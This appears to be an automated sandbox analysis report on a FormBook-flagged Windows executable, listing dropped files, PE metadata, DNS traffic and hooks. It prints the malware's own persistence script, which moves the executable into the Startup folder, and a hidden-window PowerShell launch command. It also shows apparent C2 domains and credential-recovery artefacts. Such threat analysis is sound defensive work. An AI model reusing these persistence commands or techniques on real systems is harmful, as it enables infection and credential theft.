                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):17500
                                                    Entropy (8bit):5.263894059316795
                                                    Encrypted:false
                                                    SSDEEP:384:7t9HXN7JoR1OCrqTn16bTgcy3I1JNHGnudTNWgsF:l7JoaQbTbTXhGudq
                                                    MD5:A3A4886985625362491343DE18D47AF4
                                                    SHA1:C71CDFA9E19D5FF6A619CBE81FF03BD81FFEA21C
                                                    SHA-256:212BCCE3F0DC1514E26DF84A7CAD58EFD7E61135F79866DC558AD0B18A282546
                                                    SHA-512:91726B8C43F8838AEC88042B96D0440265301016165C782EEC229AA7F349DE8EC7574670486DBDA68B48985A37A19F449AD5F6F561C98B74142F46251C1FC38F
                                                    Malicious:false
                                                    Preview: @...e.................................].7............@..........D...............fZve...F.....x.)_.......System.Management.AutomationH...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                    C:\Users\user\AppData\Local\Temp\863733.js
                                                    Process:C:\Users\user\Desktop\f5cZJ0WC0H.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):248
                                                    Entropy (8bit):5.1188385323700585
                                                    Encrypted:false
                                                    SSDEEP:6:qoq7yJDIUt7DaJf1ptLNxWDaJ0/hJI5lR9ZQqBptLNswH:JqmIU1W9ptJQW0hOlX+qBptJsM
                                                    MD5:5F82CA9F25869E47D96CA56A06F6C657
                                                    SHA1:A00FFBE80DA16370D9B3CC2EB98FBE7E890597F1
                                                    SHA-256:3DFC1D8475A377E654DB459C0C152B08727891632B4A3A4E4C5CF10A40391E2A
                                                    SHA-512:EF765B2C3CFA84391E8AC632628A0857E75CF5C339856120859A90CA90415BDD2D1062CF1813B447029C852353FA6B3EE145AF0E4628379F2FDFCAFCD873A81B
                                                    Malicious:false
                                                    Preview: var FSO = WScript.CreateObject("Scripting.FileSystemObject"); try { FSO.MoveFile("C:\\Users\\user\\Desktop\\f5cZJ0WC0H.exe", "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\f5cZJ0WC0H.exe");} catch(err) {}
                                                    C:\Users\user\AppData\Local\Temp\DB1
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.792852251086831
                                                    Encrypted:false
                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                    Malicious:true
                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bv45oio5.3oc.ps1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1je0or0.ask.psm1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogim.jpeg
                                                    Process:C:\Windows\SysWOW64\help.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                    Category:dropped
                                                    Size (bytes):83253
                                                    Entropy (8bit):7.895279141907517
                                                    Encrypted:false
                                                    SSDEEP:1536:CWvsYelgSCiWyxzvzCZFB1N091GsVBmtDmaV6mf03PF64DU:ZUl8iWe30BN090+m5ma4PUP
                                                    MD5:D89442D664D6DBE514EF71D174C0F42C
                                                    SHA1:862CA2E2F93445F9504A478087A279722E8CA6A3
                                                    SHA-256:9A70E43EBC376F0E7888897AC8FA480931A3F2F92A2BBA63D1B3B81A0D0ADFFC
                                                    SHA-512:7AC56C6879AEB160747850F525DB17BCFEB1B076991E3BBD0D523A2BA7A28ECF5E1AE318FCBF01713DCF5932F59B3A47FC48D6F2794D67878BC42D37E8B9FB90
                                                    Malicious:false
                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(....Q..R...`2.`....j.$.....+..];$....F...K.1...3.)k...@<1..@.../...G. .....g.G.....~.W.W.......
                                                    C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogrg.ini
                                                    Process:C:\Windows\SysWOW64\help.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):38
                                                    Entropy (8bit):2.7883088224543333
                                                    Encrypted:false
                                                    SSDEEP:3:rFGQJhIl:RGQPY
                                                    MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                    SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                    SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                    SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                    Malicious:false
                                                    Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                                    C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogri.ini
                                                    Process:C:\Windows\SysWOW64\help.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):40
                                                    Entropy (8bit):2.8420918598895937
                                                    Encrypted:false
                                                    SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                    MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                    SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                    SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                    SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                    Malicious:true
                                                    Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                                    C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogrv.ini
                                                    Process:C:\Windows\SysWOW64\help.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):3.4515466143119893
                                                    Encrypted:false
                                                    SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4ClRa/8lMsEoY:MlIaExGNYvOI6x40FlMYY
                                                    MD5:411DA59583A4CFC726E0DD885E007D59
                                                    SHA1:C55665D7F1610C241FE9EED79D26EE35586E90F1
                                                    SHA-256:E1B7F628944DCCD35E0515F88146B4AABFA023180BA2D2BBE118A6BBDAF5482B
                                                    SHA-512:7610378C03D7ABF76FF35B137060540E73C75B3423AFE255B6A94EEE5E9743F73E99A7A4D2233CC956EBCF0089584FD6D6C6CE3F24D5FD1406236F3332555C81
                                                    Malicious:true
                                                    Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.p.u.n.m.v.o.e.k.s.a.x.o.m.e.....A.u.t.:.......P.a.s.s.:.......
                                                    C:\Users\user\Documents\20201127\PowerShell_transcript.216865.DhT+sk6J.20201127155809.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1463
                                                    Entropy (8bit):5.29590787363706
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAz3yDvBBYx2DOXUBP6IriMzBzuVMeJzW/tHjeTKKjX4CIym1ZJX6BP6IriMzX:BZzav/YoOkVriMzhuDJ6FqDYB1ZUVria
                                                    MD5:B48B1FB348BC25C53163F1A0CE6CD288
                                                    SHA1:2A1699E1FEBE80E279FF61F842ABF8AA086B7620
                                                    SHA-256:850406D1AF6AAB2568D9C02C05492375548C6E7DB61518A462953C9EBB55A0A5
                                                    SHA-512:9EC34FD27417EB722955A9106B8184010CE9A9B5480DC43142CA1276CBCD92336858E7AEBAAC6272BD9A2D16AE3E10A02FE1F74FF7C4765373DAC5BC4EF5116B
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127155824..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216865 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'..Process ID: 5972..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127155824..**********************..PS>Start-Process -WindowStyle hidden -FilePath 'C:\W

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.801833603864588
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:f5cZJ0WC0H.exe
                                                    File size:402944
                                                    MD5:0e7d12ad28411f68d62d3d3f17382b98
                                                    SHA1:742c7b23f14ebe783cdef406b073c6e867266657
                                                    SHA256:0f26e91c2b802ec98ff2cc6269ad43f09f29e8827d2975f4e6514db0df14db6c
                                                    SHA512:260f97398c4fc45516c7972faa365d92dcb92ae7aa6e3ecabf2e839bb08f7ea925bd2f56cd234751bec8fcc9bca86d6f5deaeddfdf5f1e1c99e21a97dd469db7
                                                    SSDEEP:6144:ox6uUEXR4gt0m1jp5+Or3cOENFq7sbYLDApPU+HZw/0qfKIV02WaTs:O+w0ajnb35ENys8LcpP5qCIeis
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$................0......b......R.... ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:6869696969697168

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x45e152
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0xE41D24F5 [Wed Apr 11 07:34:13 2091 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    inc esp
                                                    aaa
                                                    pop esi
                                                    and eax, 00003537h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5e0ff0x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x5e1c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x5e0680x38.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x5c1600x5c200False0.950246989484data7.93997758183IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x600000x5e1c0x6000False0.0560709635417data2.7254040689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x660000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0x601400x468GLS_BINARY_LSB_FIRST
                                                    RT_ICON0x605b80x10a8data
                                                    RT_ICON0x616700x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                    RT_GROUP_ICON0x658a80x30data
                                                    RT_VERSION0x658e80x334data
                                                    RT_MANIFEST0x65c2c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright Microsoft 2020
                                                    Assembly Version0.0.0.0
                                                    InternalNameTesteconnect.exe
                                                    FileVersion0.0.0.0
                                                    CompanyNameMicrosoft
                                                    Comments
                                                    ProductNameTesteconnect
                                                    ProductVersion0.0.0.0
                                                    FileDescriptionTesteconnect
                                                    OriginalFilenameTesteconnect.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    11/27/20-16:00:04.100437TCP1201ATTACK-RESPONSES 403 Forbidden804973334.98.99.30192.168.2.5

                                                    Network Port Distribution

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 27, 2020 15:58:11.704583883 CET6173353192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:11.741791964 CET53617338.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:12.514935970 CET6544753192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:12.550602913 CET53654478.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:13.593369007 CET5244153192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:13.628959894 CET53524418.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:15.540461063 CET6217653192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:15.567548990 CET53621768.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:16.313227892 CET5959653192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:16.340348959 CET53595968.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:17.079448938 CET6529653192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:17.106522083 CET53652968.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:17.113156080 CET6318353192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:17.140243053 CET53631838.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:17.956078053 CET6015153192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:17.982995987 CET53601518.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:22.689755917 CET5696953192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:22.725228071 CET53569698.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:27.461447954 CET5516153192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:27.488596916 CET53551618.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:38.715620041 CET5475753192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:38.759673119 CET53547578.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:39.898868084 CET4999253192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:39.934576988 CET53499928.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:39.991681099 CET6007553192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:40.018670082 CET53600758.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:40.416693926 CET5501653192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:40.454010010 CET53550168.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:41.937921047 CET6434553192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:41.965107918 CET53643458.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:43.247811079 CET5712853192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:43.285531998 CET53571288.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:44.801865101 CET5479153192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:44.838902950 CET53547918.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:46.267684937 CET5046353192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:46.295098066 CET53504638.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:50.363706112 CET5039453192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:50.399286032 CET53503948.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:58:51.365739107 CET5853053192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:58:51.400971889 CET53585308.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:59:43.197056055 CET5381353192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:59:43.249634027 CET53538138.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:59:45.697555065 CET6373253192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:59:45.746679068 CET53637328.8.8.8192.168.2.5
                                                    Nov 27, 2020 15:59:45.757137060 CET5734453192.168.2.58.8.8.8
                                                    Nov 27, 2020 15:59:45.792571068 CET53573448.8.8.8192.168.2.5
                                                    Nov 27, 2020 16:00:03.926004887 CET5445053192.168.2.58.8.8.8
                                                    Nov 27, 2020 16:00:03.966118097 CET53544508.8.8.8192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Nov 27, 2020 15:58:43.247811079 CET192.168.2.58.8.8.80x4a26Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                                    Nov 27, 2020 15:59:43.197056055 CET192.168.2.58.8.8.80xb5deStandard query (0)www.therealnarzkollections.comA (IP address)IN (0x0001)
                                                    Nov 27, 2020 15:59:45.697555065 CET192.168.2.58.8.8.80xc60bStandard query (0)www.therealnarzkollections.comA (IP address)IN (0x0001)
                                                    Nov 27, 2020 15:59:45.757137060 CET192.168.2.58.8.8.80x7987Standard query (0)www.therealnarzkollections.comA (IP address)IN (0x0001)
                                                    Nov 27, 2020 16:00:03.926004887 CET192.168.2.58.8.8.80xe237Standard query (0)www.procertinspections.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Nov 27, 2020 15:58:43.285531998 CET8.8.8.8192.168.2.50x4a26No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                    Nov 27, 2020 15:59:43.249634027 CET8.8.8.8192.168.2.50xb5deName error (3)www.therealnarzkollections.comnonenoneA (IP address)IN (0x0001)
                                                    Nov 27, 2020 15:59:45.746679068 CET8.8.8.8192.168.2.50xc60bName error (3)www.therealnarzkollections.comnonenoneA (IP address)IN (0x0001)
                                                    Nov 27, 2020 15:59:45.792571068 CET8.8.8.8192.168.2.50x7987Name error (3)www.therealnarzkollections.comnonenoneA (IP address)IN (0x0001)
                                                    Nov 27, 2020 16:00:03.966118097 CET8.8.8.8192.168.2.50xe237No error (0)www.procertinspections.comprocertinspections.comCNAME (Canonical name)IN (0x0001)
                                                    Nov 27, 2020 16:00:03.966118097 CET8.8.8.8192.168.2.50xe237No error (0)procertinspections.com34.98.99.30A (IP address)IN (0x0001)

                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: f5cZJ0WC0H.exe PID: 6112 Parent PID: 5644

                                                    General

                                                    Start time:15:57:57
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\Desktop\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\f5cZJ0WC0H.exe'
                                                    Imagebase:0xf40000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

